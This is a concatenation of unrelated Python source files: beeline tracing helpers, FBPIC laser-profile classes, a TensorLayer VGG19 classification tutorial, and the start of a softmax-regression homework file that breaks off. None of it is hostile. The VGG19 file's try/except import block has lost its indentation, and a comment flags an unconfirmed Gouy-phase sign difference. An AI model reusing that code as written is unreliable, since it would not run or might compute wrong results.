    the queue, indicating that no further responses will be written.
    '''
    client = get_beeline()
    if client:
        return client.get_responses_queue()
def close():
    ''' Close the beeline and libhoney client, flushing any unsent events. '''
    global _GBL
    if _GBL:
        _GBL.close()
    # Always clear the global, so a subsequent init() starts fresh
    _GBL = None
def traced(name, trace_id=None, parent_id=None):
    '''
    Function decorator that wraps the entire decorated function in a trace
    span. If no trace is active in the current thread, a new trace is started
    and the wrapping span is its root span. If a trace is active, the span is
    created as a child of the existing trace.

    Example use:
    ```
    @traced(name="my_expensive_function")
    def my_func(n):
        recursive_fib(n)

    my_func(100)
    ```

    Args:
    - `name`: a descriptive name for this trace span, i.e. "function_name". This is required.
    - `trace_id`: the trace_id to use. If None, will be automatically generated.
       Use this if you want to explicitly resume a trace in this application that was
       initiated in another application, and you have the upstream trace_id.
    - `parent_id`: If trace_id is set, will populate the root span's parent
       with this id.
    '''
    return traced_impl(tracer_fn=tracer, name=name, trace_id=trace_id,
                       parent_id=parent_id)
def traced_thread(fn):
    '''
    Function decorator that passes trace context to a function intended to run
    as a thread target. The beeline uses thread-local storage to keep track of
    trace state, so tracing doesn't work across threads unless that state is
    explicitly handed between them; decorating the thread target with this
    function does the hand-over for you.

    Example use:
    ```
    @traced(name="my_async_function")
    def my_func():
        # ...
        with beeline.tracer(name="do_stuff"):
            do_stuff()

    # we want to call my_func asynchronously by passing to a thread or a thread pool
    @beeline.traced_thread
    def _my_func_t():
        return my_func()

    t = threading.Thread(target=_my_func_t)
    t.start()
    ```
    '''
    client = get_beeline()
    # If the beeline is not initialized, or no trace is active, there is no
    # state to carry over - return a transparent passthrough wrapper.
    if client is None or client.tracer_impl.get_active_trace_id() is None:
        @functools.wraps(fn)
        def _passthrough(*args, **kwargs):
            return fn(*args, **kwargs)
        return _passthrough

    # Snapshot the trace state now (in the spawning thread), and install it in
    # the target thread just before the wrapped function runs.
    state_snapshot = client.tracer_impl._trace.copy()

    @functools.wraps(fn)
    def _with_trace_state(*args, **kwargs):
        client.tracer_impl._trace = state_snapshot
        return fn(*args, **kwargs)
    return _with_trace_state
|
# Copyright 2016, FBPIC contributors
# Authors: <NAME>, <NAME>
# License: 3-Clause-BSD-LBNL
"""
This file is part of the Fourier-Bessel Particle-In-Cell code (FB-PIC)
It defines a set of common transverse laser profiles.
"""
import numpy as np
from scipy.special import factorial, genlaguerre, binom
# Generic classes
# ---------------
class LaserTransverseProfile(object):
    """
    Base class for all 2D transverse laser profiles.

    A transverse profile can be combined with a 1D longitudinal laser profile
    to define a 3D laser profile that is valid under the paraxial
    approximation. Any new transverse laser profile should inherit from this
    class, and define its own `evaluate(x, y, z)` method, using the same
    signature as the method below.
    """

    def __init__(self, propagation_direction, gpu_capable=False):
        """
        Initialize the propagation direction of the laser.
        (Each subclass should call this method at initialization.)

        Parameter
        ---------
        propagation_direction: int
            Indicates in which direction the laser propagates.
            This should be either 1 (laser propagates towards positive z)
            or -1 (laser propagates towards negative z).

        gpu_capable: boolean
            Indicates whether this laser profile works with cupy arrays on
            GPU. This is usually the case if it only uses standard arithmetic
            and numpy operations. Default: False.
        """
        assert propagation_direction in (-1, 1)
        self.propag_direction = float(propagation_direction)
        self.gpu_capable = gpu_capable

    def evaluate(self, x, y, z):
        """
        Return the complex transverse laser profile.

        This profile should be valid for any propagation distance z.
        In particular, it should include diffraction effects (e.g. change in
        effective waist, effective amplitude, Gouy phase, etc. for a Gaussian
        pulse). It should not include the longitudinal laser envelope, since
        this is instead included in the longitudinal profile.

        Parameters
        -----------
        x, y, z: ndarrays (meters)
            The position at which to calculate the profile (in the lab frame)

        Returns:
        --------
        profile: ndarray
            Array of the same shape as x, containing the complex
            transverse profile
        """
        # Dummy implementation: subclasses are expected to override this.
        return np.zeros_like(x, dtype='complex')

    def squared_profile_integral(self):
        """
        Return the integral of the square of the absolute value of
        the (complex) laser profile in the transverse plane:

        .. math::
            \\int_0^{2\\pi} d\\theta \\int_0^\\infty r \,dr|f(r, \\theta)|^2

        Returns:
        --------
        integral: float
        """
        # Dummy implementation: subclasses are expected to override this.
        return 0
# Particular classes for each transverse laser profile
# ------------------------------------------------------
class GaussianTransverseProfile(LaserTransverseProfile):
    """Class that calculates a Gaussian transverse laser profile."""

    def __init__(self, waist, zf=0., lambda0=0.8e-6, propagation_direction=1):
        """
        Define the complex transverse profile of a Gaussian laser.

        **In the focal plane** (:math:`z=z_f`), the profile translates to a
        laser with a transverse electric field:

        .. math::
            E(x,y,z=z_f) \propto \exp\left( -\\frac{r^2}{w_0^2} \\right)

        where :math:`w_0` is the laser waist and :math:`r = \sqrt{x^2 + y^2}`.
        Note that the peak amplitude of the profile is unity at the focus.

        Parameters
        ----------
        waist: float (in meter)
            Laser waist at the focal plane, defined as :math:`w_0` in the
            above formula.

        zf: float (in meter), optional
            The position of the focal plane (in the lab frame).
            If ``zf`` is not provided, the code assumes that ``zf=0.``.

        lambda0: float (in meter), optional
            The wavelength of the laser (in the lab frame), defined as
            :math:`\\lambda_0` in the above formula.
            Default: 0.8 microns (Ti:Sapph laser).

        propagation_direction: int, optional
            Indicates in which direction the laser propagates.
            This should be either 1 (laser propagates towards positive z)
            or -1 (laser propagates towards negative z).
        """
        # This profile uses only numpy arithmetic, so it is GPU capable
        LaserTransverseProfile.__init__(self, propagation_direction,
                                        gpu_capable=True)
        # Wavevector and Rayleigh length
        wavenumber = 2 * np.pi / lambda0
        rayleigh_length = 0.5 * wavenumber * waist**2
        # Store the parameters
        self.k0 = wavenumber
        self.inv_zr = 1. / rayleigh_length
        self.zf = zf
        self.w0 = waist

    def evaluate(self, x, y, z):
        """
        See the docstring of LaserTransverseProfile.evaluate
        """
        # The formula for the transverse laser profile (in complex numbers) is
        # obtained by multiplying the Fourier transform of the laser at focus
        #   E(k_x, k_y) = exp(-(k_x^2 + k_y^2)w_0^2/4)
        # by the paraxial propagator e^(-i ((k_x^2 +k_y^2)/2k0)(z-z_foc))
        # and then taking the inverse Fourier transform in x, y.
        direction = self.propag_direction
        # Diffraction factor (encodes effective waist, amplitude, Gouy phase)
        diffract = 1. + 1j * direction * (z - self.zf) * self.inv_zr
        # Argument of the complex exponential
        argument = -(x**2 + y**2) / (self.w0**2 * diffract)
        # Transverse profile
        return np.exp(argument) / diffract

    def squared_profile_integral(self):
        """
        See the docstring of LaserTransverseProfile.squared_profile_integral
        """
        return 0.5 * np.pi * self.w0**2
class LaguerreGaussTransverseProfile( LaserTransverseProfile ):
    """Class that calculates a Laguerre-Gauss transverse laser profile."""

    def __init__( self, p, m, waist, zf=0., lambda0=0.8e-6, theta0=0.,
                  propagation_direction=1 ):
        """
        Define the complex transverse profile of a Laguerre-Gauss laser.

        Unlike the :any:`DonutLikeLaguerreGaussLaser` profile, this
        profile has a phase which is independent of the azimuthal angle
        :math:`\\theta`, and an intensity profile which does depend on
        :math:`\\theta`.

        **In the focal plane** (:math:`z=z_f`), the profile translates to a
        laser with a transverse electric field:

        .. math::
            E(x,y,z=z_f) \propto \, f(r, \\theta) \,
            \exp\left( -\\frac{r^2}{w_0^2} \\right)

            \mathrm{with} \qquad f(r, \\theta) =
            \sqrt{\\frac{p!(2-\delta_{m,0})}{(m+p)!}}
            \\left( \\frac{\sqrt{2}r}{w_0} \\right)^m
            L^m_p\\left( \\frac{2 r^2}{w_0^2} \\right)
            \cos[ m(\\theta - \\theta_0)]

        where :math:`L^m_p` is a Laguerre polynomial and :math:`w_0` is the
        laser waist.

        Note that, for :math:`p=m=0`, the profile reduces to a Gaussian and the
        peak field amplitude is unity. For :math:`m \\neq 0`, the peak
        amplitude is reduced, such that the energy of the pulse is independent
        of ``p`` and ``m``.

        (For more info, see
        `Siegman, Lasers (1986) <https://www.osapublishing.org/books/bookshelf/lasers.cfm>`_,
        Chapter 16: Wave optics and Gaussian beams)

        .. warning::
            The above formula depends on a parameter :math:`m`
            (see documentation below). In order to be properly resolved by
            the simulation, a Laguerre-Gauss profile with a given :math:`m`
            requires the azimuthal modes from :math:`0` to :math:`m+1`.
            (i.e. the number of required azimuthal modes is ``Nm=m+2``)

            The non-linear plasma response for this profile (e.g.
            wakefield driven by the ponderomotive force) may require
            even more azimuthal modes.

        Parameters
        ----------
        p: int (positive)
            The order of the Laguerre polynomial. (Increasing ``p`` increases
            the number of "rings" in the radial intensity profile of the laser.)

        m: int (positive)
            The azimuthal order of the pulse.
            (In the transverse plane, the field of the pulse varies as
            :math:`\cos[m(\\theta-\\theta_0)]`.)

        waist: float (in meter)
            Laser waist at the focal plane, defined as :math:`w_0` in the
            above formula.

        zf: float (in meter), optional
            The position of the focal plane (in the lab frame).
            If ``zf`` is not provided, the code assumes ``zf=0.``.

        lambda0: float (in meter), optional
            The wavelength of the laser (in the lab frame), defined as
            :math:`\\lambda_0` in the above formula.
            Default: 0.8 microns (Ti:Sapph laser).

        theta0: float (in radian), optional
            The azimuthal position of (one of) the maxima of intensity, in the
            transverse plane.
            (In the transverse plane, the field of the pulse varies as
            :math:`\cos[m(\\theta-\\theta_0)]`.)

        propagation_direction: int, optional
            Indicates in which direction the laser propagates.
            This should be either 1 (laser propagates towards positive z)
            or -1 (laser propagates towards negative z).
        """
        # Validate m *before* it is used in any computation, so that an
        # invalid m raises the intended ValueError (previously, a negative m
        # was first passed to `factorial`, triggering a numeric error instead).
        if m < 0 or type(m) is not int:
            raise ValueError("m should be an integer positive number.")
        # Initialize propagation direction
        LaserTransverseProfile.__init__(self, propagation_direction)
        # Wavevector and Rayleigh length
        k0 = 2*np.pi/lambda0
        zr = 0.5*k0*waist**2
        # Scaling factor, so that the pulse energy is independent of p and m:
        # sqrt( p! (2 - delta_{m,0}) / (m+p)! )
        if m == 0:
            scaled_amplitude = 1.
        else:
            scaled_amplitude = np.sqrt( 2.*factorial(p)/factorial(m+p) )
        # Store the parameters
        self.p = p
        self.m = m
        self.scaled_amplitude = scaled_amplitude
        self.laguerre_pm = genlaguerre(self.p, self.m) # Laguerre polynomial
        self.theta0 = theta0
        self.k0 = k0
        self.inv_zr = 1./zr
        self.zf = zf
        self.w0 = waist

    def evaluate( self, x, y, z ):
        """
        See the docstring of LaserTransverseProfile.evaluate
        """
        # Diffraction factor, effective waist and Gouy phase
        prop_dir = self.propag_direction
        diffract_factor = 1. + 1j * prop_dir * (z - self.zf) * self.inv_zr
        w = self.w0 * abs( diffract_factor )
        psi = np.angle( diffract_factor )
        # Calculate the scaled radius and azimuthal angle
        scaled_radius_squared = 2*( x**2 + y**2 ) / w**2
        scaled_radius = np.sqrt( scaled_radius_squared )
        theta = np.angle( x + 1.j*y )
        # Calculate the argument of the complex exponential
        exp_argument = - (x**2 + y**2) / (self.w0**2 * diffract_factor) \
            - 1.j*(2*self.p + self.m)*psi # *Additional* Gouy phase
        # Get the transverse profile
        profile = np.exp(exp_argument) / diffract_factor \
            * scaled_radius**self.m * self.laguerre_pm(scaled_radius_squared) \
            * np.cos( self.m*(theta-self.theta0) )
        # Scale the amplitude, so that the pulse energy is independent of m and p
        profile *= self.scaled_amplitude
        return profile

    def squared_profile_integral(self):
        """
        See the docstring of LaserTransverseProfile.squared_profile_integral
        """
        return 0.5 * np.pi * self.w0**2
class DonutLikeLaguerreGaussTransverseProfile( LaserTransverseProfile ):
    """Define the complex transverse profile of a donut-like Laguerre-Gauss
    laser."""

    def __init__( self, p, m, waist, zf=0., lambda0=0.8e-6,
                  propagation_direction=1 ):
        """
        Define the complex transverse profile of a donut-like Laguerre-Gauss
        laser.

        Unlike the :any:`LaguerreGaussLaser` profile, this
        profile has a phase which depends on the azimuthal angle
        :math:`\\theta` (cork-screw pattern), and an intensity profile which
        is independent on :math:`\\theta` (donut-like).

        **In the focal plane** (:math:`z=z_f`), the profile translates to a
        laser with a transverse electric field:

        .. math::
            E(x,y,z=zf) \propto \, \, f(r) \,
            \exp\left( -\\frac{r^2}{w_0^2} \\right) \,
            \exp\left( -i m\\theta \\right)

            \mathrm{with} \qquad f(r) =
            \sqrt{\\frac{p!}{(|m|+p)!}}
            \\left( \\frac{\sqrt{2}r}{w_0} \\right)^{|m|}
            L^{|m|}_p\\left( \\frac{2 r^2}{w_0^2} \\right)

        where :math:`L^m_p` is a Laguerre polynomial and :math:`w_0` is the
        laser waist.

        (For more info, see
        `Siegman, Lasers (1986) <https://www.osapublishing.org/books/bookshelf/lasers.cfm>`_,
        Chapter 16: Wave optics and Gaussian beams)

        .. warning::
            The above formula depends on a parameter :math:`m`
            (see documentation below). In order to be properly resolved by
            the simulation, a Laguerre-Gauss profile with a given :math:`m`
            requires the azimuthal modes from :math:`0` to :math:`|m|+1`.
            (i.e. the number of required azimuthal modes is ``Nm=|m|+2``)

        Parameters
        ----------
        p: int
            The order of the Laguerre polynomial. (Increasing ``p`` increases
            the number of "rings" in the radial intensity profile of the laser.)

        m: int (positive or negative)
            The azimuthal order of the pulse. The laser phase in a given
            transverse plane varies as :math:`m \\theta`.

        waist: float (in meter)
            Laser waist at the focal plane, defined as :math:`w_0` in the
            above formula.

        zf: float (in meter), optional
            The position of the focal plane (in the lab frame).
            If ``zf`` is not provided, the code assumes that ``zf=0.``.

        lambda0: float (in meter), optional
            The wavelength of the laser (in the lab frame), defined as
            :math:`\\lambda_0` in the above formula.
            Default: 0.8 microns (Ti:Sapph laser).

        propagation_direction: int, optional
            Indicates in which direction the laser propagates.
            This should be either 1 (laser propagates towards positive z)
            or -1 (laser propagates towards negative z).
        """
        # Initialize propagation direction
        LaserTransverseProfile.__init__(self, propagation_direction)
        # Wavevector and Rayleigh length
        k0 = 2*np.pi/lambda0
        zr = 0.5*k0*waist**2
        # Scaling factor, so that the pulse energy is independent of p and m.
        scaled_amplitude = np.sqrt( factorial(p)/factorial(abs(m)+p) )
        # Store the parameters
        # (note: m may be negative here, unlike in LaguerreGaussTransverseProfile)
        self.p = p
        self.m = m
        self.scaled_amplitude = scaled_amplitude
        self.laguerre_pm = genlaguerre(self.p, abs(m)) # Laguerre polynomial
        self.k0 = k0
        self.inv_zr = 1./zr
        self.zf = zf
        self.w0 = waist

    def evaluate( self, x, y, z ):
        """
        See the docstring of LaserTransverseProfile.evaluate
        """
        # Diffraction factor, waist and Gouy phase
        prop_dir = self.propag_direction
        diffract_factor = 1. + 1j * prop_dir * ( z - self.zf ) * self.inv_zr
        w = self.w0 * abs( diffract_factor )
        psi = np.angle( diffract_factor )
        # Calculate the scaled radius and azimuthal angle
        scaled_radius_squared = 2*( x**2 + y**2 ) / w**2
        scaled_radius = np.sqrt( scaled_radius_squared )
        theta = np.angle( x + 1.j*y )
        # Calculate the argument of the complex exponential
        # NOTE(review): the additional Gouy-phase term enters with sign +1j
        # here, whereas LaguerreGaussTransverseProfile.evaluate uses -1j.
        # Presumably an intentional convention difference - worth confirming.
        exp_argument = - 1.j*self.m*theta \
            - (x**2 + y**2) / (self.w0**2 * diffract_factor) \
            + 1.j*(2*self.p + abs(self.m))*psi # *Additional* Gouy phase
        # Get the transverse profile
        profile = np.exp(exp_argument) / diffract_factor \
            * scaled_radius**abs(self.m) \
            * self.laguerre_pm(scaled_radius_squared)
        # Scale the amplitude, so that the pulse energy is independent of m and p
        profile *= self.scaled_amplitude
        return profile

    def squared_profile_integral(self):
        """
        See the docstring of LaserTransverseProfile.squared_profile_integral
        """
        return 0.5 * np.pi * self.w0**2
class FlattenedGaussianTransverseProfile( LaserTransverseProfile ):
    """Define the complex transverse profile of a focused flattened Gaussian
    laser."""

    def __init__( self, w0, N=6, zf=0., lambda0=0.8e-6,
                  propagation_direction=1 ):
        """
        Define a complex transverse profile with a flattened Gaussian intensity
        distribution **far from focus** that transforms into a distribution
        with rings **in the focal plane**. (See `Santarsiero et al., J.
        Modern Optics, 1997 <http://doi.org/10.1080/09500349708232927>`_)

        Increasing the parameter ``N`` increases the
        flatness of the transverse profile **far from focus**,
        and increases the number of rings **in the focal plane**.

        **In the focal plane** (:math:`z=z_f`), the profile translates to a
        laser with a transverse electric field:

        .. math::
            E(x,y,z=zf) \propto
            \exp\\left(-\\frac{r^2}{(N+1)w_0^2}\\right)
            \sum_{n=0}^N c'_n L^0_n\\left(\\frac{2\,r^2}{(N+1)w_0^2}\\right)

        with Laguerre polynomials :math:`L^0_n` and
        :math:`c'_n = \sum_{m=n}^{N}\\frac{1}{2^m}\\binom{m}{n}`

        - For :math:`N=0`, this is a Gaussian profile: :math:`E\propto\exp\\left(-\\frac{r^2}{w_0^2}\\right)`.
        - For :math:`N\\rightarrow\infty`, this is a Jinc profile: :math:`E\propto \\frac{J_1(r/w_0)}{r/w_0}`.

        The equivalent expression **far from focus** is

        .. math::
            E(x,y,z=\infty) \propto
            \exp\\left(-\\frac{(N+1)r^2}{w(z)^2}\\right)
            \sum_{n=0}^N \\frac{1}{n!}\left(\\frac{(N+1)\,r^2}{w(z)^2}\\right)^n

            \mathrm{with} \qquad w(z) = \\frac{\lambda_0}{\pi w_0}|z-z_{foc}|

        - For :math:`N=0`, this is a Gaussian profile: :math:`E\propto\exp\\left(-\\frac{r^2}{w_(z)^2}\\right)`.
        - For :math:`N\\rightarrow\infty`, this is a flat profile: :math:`E\propto \\Theta(w(z)-r)`.

        Parameters
        ----------
        w0: float (in meter)
            Laser spot size in the focal plane, defined as :math:`w_0` in the
            above formula.

        N: int
            Determines the "flatness" of the transverse profile, far from
            focus (see the above formula).
            Default: ``N=6`` ; somewhat close to an 8th order supergaussian.

        zf: float (in meter), optional
            The position of the focal plane (in the lab frame).
            If ``zf`` is not provided, the code assumes that ``zf=0.``.

        lambda0: float (in meter), optional
            The wavelength of the laser (in the lab frame)
            Default: 0.8 microns (Ti:Sapph laser).

        propagation_direction: int, optional
            Indicates in which direction the laser propagates.
            This should be either 1 (laser propagates towards positive z)
            or -1 (laser propagates towards negative z).
        """
        # Initialize propagation direction
        LaserTransverseProfile.__init__(self, propagation_direction)
        # Ensure that N is an integer
        self.N = int(round(N))
        # Calculate effective waist of the Laguerre-Gauss modes, at focus
        self.w_foc = w0*(self.N+1)**.5
        # Wavevector and Rayleigh length
        k0 = 2 * np.pi / lambda0
        zr = 0.5 * k0 * self.w_foc**2
        # Store laser parameters
        self.k0 = k0
        self.inv_zr = 1./zr
        self.zf = zf
        # Calculate the coefficients c'_n for the Laguerre-Gaussian modes
        # (normalized by N+1), following the Santarsiero et al. reference
        self.cn = np.empty(self.N+1)
        for n in range(self.N+1):
            m_values = np.arange(n, self.N+1)
            self.cn[n] = np.sum((1./2)**m_values * binom(m_values,n)) / (self.N+1)

    def evaluate( self, x, y, z ):
        """
        See the docstring of LaserTransverseProfile.evaluate
        """
        # Diffraction factor, waist and Gouy phase
        prop_dir = self.propag_direction
        diffract_factor = 1. + 1j * prop_dir * (z - self.zf) * self.inv_zr
        w = self.w_foc * np.abs( diffract_factor )
        psi = np.angle( diffract_factor )
        # Argument for the Laguerre polynomials
        scaled_radius_squared = 2*( x**2 + y**2 ) / w**2
        # Sum recursively over the Laguerre polynomials
        laguerre_sum = np.zeros_like( x, dtype=np.complex128 )
        for n in range(0, self.N+1):
            # Recursive calculation of the Laguerre polynomial:
            # - `L` represents $L_n$
            # - `L1` represents $L_{n-1}$
            # - `L2` represents $L_{n-2}$
            # NOTE: the recurrence relies on the loop running n = 0, 1, 2, ...
            # in order (`L1 = L` at n==1 reads the value set at n==0); do not
            # reorder these branches or iterate out of sequence.
            if n==0:
                L = 1.
            elif n==1:
                L1 = L
                L = 1. - scaled_radius_squared
            else:
                L2 = L1
                L1 = L
                L = (((2*n -1) - scaled_radius_squared) * L1 - (n - 1) * L2) / n
            # Add to the sum, including the term for the additional Gouy phase
            laguerre_sum += self.cn[n] * np.exp( - (2j* n) * psi ) * L
        # Final profile: multiply by n-independent propagation factors
        exp_argument = - (x**2 + y**2) / (self.w_foc**2 * diffract_factor)
        profile = laguerre_sum * np.exp( exp_argument ) / diffract_factor
        return profile

    def squared_profile_integral(self):
        """
        See the docstring of LaserTransverseProfile.squared_profile_integral
        """
        return 0.5 * np.pi * self.w_foc**2 * sum( self.cn**2 )
|
# examples/pretrained_cnn/tutorial_vgg19.py
#! /usr/bin/python
# -*- coding: utf-8 -*-
"""
VGG-19 for ImageNet.
Pre-trained model in this example - VGG19 NPZ and
trainable examples of VGG16/19 in TensorFlow can be found here:
https://github.com/machrisaa/tensorflow-vgg
For simplified CNN layer see "Convolutional layer (Simplified)"
in read the docs website.
"""
import os
import time
import numpy as np
import skimage
import skimage.io
import skimage.transform
import tensorflow as tf
import tensorlayer as tl
from tensorlayer.layers import *
tf.logging.set_verbosity(tf.logging.DEBUG)
tl.logging.set_verbosity(tl.logging.DEBUG)
try:
from tensorlayer.models.imagenet_classes import *
except Exception as e:
raise Exception(
"{} / download the file from: https://github.com/tensorlayer/tensorlayer/tree/master/example/data".format(e)
)
# Per-channel BGR mean values subtracted during VGG preprocessing
VGG_MEAN = [103.939, 116.779, 123.68]
# Location of the pre-trained VGG19 weights file
MODEL_DIR = "models"
MODEL_NAME = "vgg19.npy"
MODEL_PATH = os.path.join(MODEL_DIR, MODEL_NAME)
def load_image(path):
    """
    Load an image, scale pixel values to [0, 1], center-crop to a square,
    and resize it to the 224x224 input resolution expected by VGG.

    Parameters
    ----------
    path : str
        Path of the image file to load.

    Returns
    -------
    numpy.ndarray
        The cropped and resized image, shape (224, 224, 3), values in [0, 1].
    """
    img = skimage.io.imread(path)
    # Assumes an 8-bit image so division by 255 maps into [0, 1] -- the
    # check below rejects anything outside that range.
    img = img / 255.0
    # BUG FIX: `... is False` compares object identity, not truth value;
    # use boolean negation instead.
    if not ((0 <= img).all() and (img <= 1.0).all()):
        raise Exception("image value should be [0, 1]")
    # Crop the largest centered square from the image.
    short_edge = min(img.shape[:2])
    yy = int((img.shape[0] - short_edge) / 2)
    xx = int((img.shape[1] - short_edge) / 2)
    crop_img = img[yy:yy + short_edge, xx:xx + short_edge]
    # Resize to the fixed VGG input resolution.
    resized_img = skimage.transform.resize(crop_img, (224, 224), anti_aliasing=False)
    return resized_img
def print_prob(prob):
    """
    Print the top-1 and top-5 ImageNet predictions for one probability vector.

    Parameters
    ----------
    prob : numpy.ndarray
        Class probabilities for a single image, one entry per ImageNet class.

    Returns
    -------
    str
        The name of the most probable class.
    """
    synset = class_names
    # Class indices ordered from most to least probable.
    ranked = np.argsort(prob)[::-1]
    top1 = synset[ranked[0]]
    print("Top1: ", top1, prob[ranked[0]])
    top5 = [(synset[idx], prob[idx]) for idx in ranked[:5]]
    print("Top5: ", top5)
    return top1
def Vgg19(rgb):
    """
    Build the VGG 19 Model

    Parameters
    -----------
    rgb : rgb image placeholder [batch, height, width, 3] values scaled [0, 1]
    """
    start_time = time.time()
    print("build model started")
    rgb_scaled = rgb * 255.0
    # Convert RGB to BGR (the pre-trained weights expect BGR ordering).
    red, green, blue = tf.split(rgb_scaled, 3, 3)
    for channel in (red, green, blue):
        if channel.get_shape().as_list()[1:] != [224, 224, 1]:
            raise Exception("image size unmatch")
    bgr = tf.concat([
        blue - VGG_MEAN[0],
        green - VGG_MEAN[1],
        red - VGG_MEAN[2],
    ], axis=3)
    if bgr.get_shape().as_list()[1:] != [224, 224, 3]:
        raise Exception("image size unmatch")
    # input layer
    net = InputLayer(bgr, name='input')
    # Convolutional stages: (number of conv layers, output channels) per stage.
    # Layer/pool names reproduce the original conv{stage}_{layer} / pool{stage}.
    in_channels = 3
    stages = [(2, 64), (2, 128), (4, 256), (4, 512), (4, 512)]
    for stage, (n_layers, out_channels) in enumerate(stages, start=1):
        for layer in range(1, n_layers + 1):
            net = Conv2dLayer(
                net, act=tf.nn.relu, shape=[3, 3, in_channels, out_channels],
                strides=[1, 1, 1, 1], padding='SAME',
                name='conv%d_%d' % (stage, layer)
            )
            in_channels = out_channels
        net = PoolLayer(
            net, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME',
            pool=tf.nn.max_pool, name='pool%d' % stage
        )
    # fc 6~8
    net = FlattenLayer(net, name='flatten')
    net = DenseLayer(net, n_units=4096, act=tf.nn.relu, name='fc6')
    net = DenseLayer(net, n_units=4096, act=tf.nn.relu, name='fc7')
    net = DenseLayer(net, n_units=1000, act=None, name='fc8')
    print("build model finished: %fs" % (time.time() - start_time))
    return net
def Vgg19_simple_api(rgb):
    """
    Build the VGG 19 Model

    Parameters
    -----------
    rgb : rgb image placeholder [batch, height, width, 3] values scaled [0, 1]
    """
    start_time = time.time()
    print("build model started")
    rgb_scaled = rgb * 255.0
    # Convert RGB to BGR (the pre-trained weights expect BGR ordering).
    red, green, blue = tf.split(rgb_scaled, 3, 3)
    for channel in (red, green, blue):
        if channel.get_shape().as_list()[1:] != [224, 224, 1]:
            raise Exception("image size unmatch")
    bgr = tf.concat([
        blue - VGG_MEAN[0],
        green - VGG_MEAN[1],
        red - VGG_MEAN[2],
    ], axis=3)
    if bgr.get_shape().as_list()[1:] != [224, 224, 3]:
        raise Exception("image size unmatch")
    # input layer
    net = InputLayer(bgr, name='input')
    # Convolutional stages: (number of conv layers, filters) per stage.
    # Layer/pool names reproduce the original conv{stage}_{layer} / pool{stage}.
    stages = [(2, 64), (2, 128), (4, 256), (4, 512), (4, 512)]
    for stage, (n_layers, n_filter) in enumerate(stages, start=1):
        for layer in range(1, n_layers + 1):
            net = Conv2d(
                net, n_filter=n_filter, filter_size=(3, 3), strides=(1, 1),
                act=tf.nn.relu, padding='SAME',
                name='conv%d_%d' % (stage, layer)
            )
        net = MaxPool2d(
            net, filter_size=(2, 2), strides=(2, 2), padding='SAME',
            name='pool%d' % stage
        )
    # fc 6~8
    net = FlattenLayer(net, name='flatten')
    net = DenseLayer(net, n_units=4096, act=tf.nn.relu, name='fc6')
    net = DenseLayer(net, n_units=4096, act=tf.nn.relu, name='fc7')
    net = DenseLayer(net, n_units=1000, act=None, name='fc8')
    print("build model finished: %fs" % (time.time() - start_time))
    return net
# --- Build the network, restore pre-trained weights, classify one image ---
sess = tf.InteractiveSession()
x = tf.placeholder("float", [None, 224, 224, 3])
# net = Vgg19(x)
net = Vgg19_simple_api(x)
y = net.outputs
probs = tf.nn.softmax(y, name="prob")
tl.layers.initialize_global_variables(sess)
# You need to download the pre-trained model - VGG19 NPY
if not os.path.isfile(MODEL_PATH):
    print("Please download vgg19.npy from : https://github.com/machrisaa/tensorflow-vgg")
    exit()
# `allow_pickle=True` is required on NumPy >= 1.16.3 to load the pickled
# parameter dictionary stored in the .npy file.
npy_file = np.load(MODEL_PATH, encoding='latin1', allow_pickle=True).item()
params = []
# Layers are stored as {name: [W, b]}; sorted order matches the network order.
for val in sorted(npy_file.items()):
    W = np.asarray(val[1][0])
    b = np.asarray(val[1][1])
    print("  Loading %s: %s, %s" % (val[0], W.shape, b.shape))
    params.extend([W, b])
print("Restoring model from npy file")
tl.files.assign_params(sess, params, net)
img1 = load_image("data/tiger.jpeg")  # test data in github
img1 = img1.reshape((1, 224, 224, 3))
start_time = time.time()
prob = sess.run(probs, feed_dict={x: img1})
# BUG FIX: `%.5ss` truncated the float's *string* form to 5 characters;
# `%.5fs` (5 decimal places plus the 's' unit) was intended.
print("End time : %.5fs" % (time.time() - start_time))
print_prob(prob[0])
|
import numpy as np
import math
#-------------------------------------------------------------------------
'''
Problem 1: softmax regression
In this problem, you will implement the softmax regression for multi-class classification problems.
The main goal of this problem is to extend the logistic regression method to solving multi-class classification problems.
We will get familiar with computing gradients of vectors/matrices.
We will use multi-class cross entropy as the loss function and stochastic gradient descent to train the model parameters.
You could test the correctness of your code by typing `nosetests test1.py` in the terminal.
Notations:
---------- input data ----------------------
p: the number of input features, an integer scalar.
c: the number of classes in the classification task, an integer scalar.
x: the feature vector of a data instance, a float numpy matrix of shape p by 1.
y: the label of a training instance, an integer scalar value. The values can be 0,1,2, ..., or (c-1).
---------- model parameters ----------------------
W: the weight matrix of softmax regression, a float numpy matrix of shape (c by p).
b: the bias values of softmax regression, a float numpy matrix of shape c by 1.
---------- values ----------------------
z: the linear logits, a float numpy matrix of shape c by 1.
a: the softmax activations, a float numpy matrix of shape c by 1.
L: the multi-class cross entropy loss, a float scalar.
---------- partial gradients ----------------------
dL_da: the partial gradients of the loss function L w.r.t. the activations a, a float numpy matrix of shape c by 1.
The i-th element dL_da[i] represents the partial gradient of the loss function L w.r.t. the i-th activation a[i]: d_L / d_a[i].
da_dz: the partial gradient of the activations a w.r.t. the logits z, a float numpy matrix of shape (c by c).
The (i,j)-th element of da_dz represents the partial gradient ( d_a[i] / d_z[j] )
dz_dW: the partial gradient of logits z w.r.t. the weight matrix W, a numpy float matrix of shape (c by p).
The (i,j)-th element of dz_dW represents the partial gradient of the i-th logit (z[i]) w.r.t. the weight W[i,j]: d_z[i] / d_W[i,j]
dz_db: the partial gradient of the logits z w.r.t. the biases b, a float matrix of shape c by 1.
Each element dz_db[i] represents the partial gradient of the i-th logit z[i] w.r.t. the i-th bias b[i]: d_z[i] / d_b[i]
---------- partial gradients of parameters ------------------
dL_dW: the partial gradients of the loss function L w.r.t. the weight matrix W, a numpy float matrix of shape (c by p).
The i,j-th element dL_dW[i,j] represents the partial gradient of the loss function L w.r.t. the i,j-th weight W[i,j]: d_L / d_W[i,j]
dL_db: the partial gradient of the loss function L w.r.t. the biases b, a float numpy matrix of shape c by 1.
The i-th element dL_db[i] represents the partial gradient of the loss function w.r.t. the i-th bias: d_L / d_b[i]
---------- training ----------------------
alpha: the step-size parameter of gradient descent, a float scalar.
n_epoch: the number of passes to go through the training dataset in order to train the model, an integer scalar.
'''
#-----------------------------------------------------------------
# Forward Pass
#-----------------------------------------------------------------
#-----------------------------------------------------------------
def compute_z(x,W,b):
    '''
    Compute the linear logits of one data instance: z = W x + b.
    Input:
        x: the feature vector of a data instance, a float numpy matrix of shape p by 1. Here p is the number of features/dimensions.
